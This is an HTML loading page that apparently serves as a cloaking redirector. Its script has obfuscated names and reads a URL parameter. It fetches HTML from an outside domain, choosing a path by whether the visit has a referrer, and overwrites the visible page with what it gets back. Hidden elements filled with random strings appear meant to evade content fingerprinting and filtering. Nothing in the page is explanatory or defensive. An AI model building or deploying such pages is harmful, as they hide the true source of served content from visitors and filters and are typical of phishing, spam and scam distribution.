<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hARC1o {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hARC1o .I6yUWap {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hARC1o .content {
            line-height: 50px;
            text-align: center
        }

        .hARC1o .img {
            width: 100%
        }

        .hARC1o .QjP59eO {
            text-align: center
        }

        .hARC1o .QjP59eO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hARC1o .QjP59eO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hARC1o .QjP59eO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hARC1o .QjP59eO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hARC1o .QjP59eO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hARC1o .QjP59eO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hARC1o .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qqqybzUW0hNtm(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var blfFNg = qqqybzUW0hNtm('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ blfFNg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ blfFNg +".html?a=share";
		}
		
        GmBUNI=url+"#"+new Date().getTime();
        GmBUNI && function() {
            $.get(GmBUNI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >Ro81VaHO1Kss4nzSOUw0gEEymdWmUYSm4RRSRt5juewFpBkv7NjejRvDMM6yr</h1>
<div style='display:none'>pvSy7inXUPRRN4qQf7SNMot</div>
<h1 style='display:none' >Ro81VaHO1Kss4nzSOUw0gEEymdWmUYSm4RRSRt5juewFpBkv7NjejRvDMM6yr</h1>
<ul style='display:none' >KzVZOm2Dc13ObmELcoBGi3554mWWaCoaQlUb3xA8r1Tes5e8Eml52JbMpGpm8cdT5GhHnogJL7CNDYEm</ul>
<li style='display:none' >ZtCH1pyMsDvQtSdtlZvnQVZJF1</li>
<b style='display:none' >Si5ugKYwIIaxYOIptsY753fKFpRPIRYBznpGIUYW6leLMa1gidYiKW8qfmsAzK1qogPtaaN54UD9ba35H1qT37</b>
<span style='display:none'>cyi6e3UXRmULJ1UcFMJcP20qXZce1DS79iOwd33FYYMi7hAp8Q7oIIkow5S1bLjIlJEm7Q14pUiSQ4gzAiBv6GkCu7dLWafQeq</span><div class="hARC1o">
    <div class="I6yUWap">
        <div class="QjP59eO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>zOaDjxBKRfOTte7DWOWszheaaKg7nHHCtjoaUAQeWM9BiHec5HHcQXwWSbJWv6QePQ8aEUH</span>
<li style='display:none' >iMxEPZnmoSOPlyXxtSkurCxjPyLZp1Qc3Xan17TSe0nX2tii6jh</li>
<b style='display:none' >fnh5ORvhvPtqJpQdFIpbLKLz6fQV1wzJDaNRvR5S70fQILqv0PgFtMsdkjA</b></body>
</html>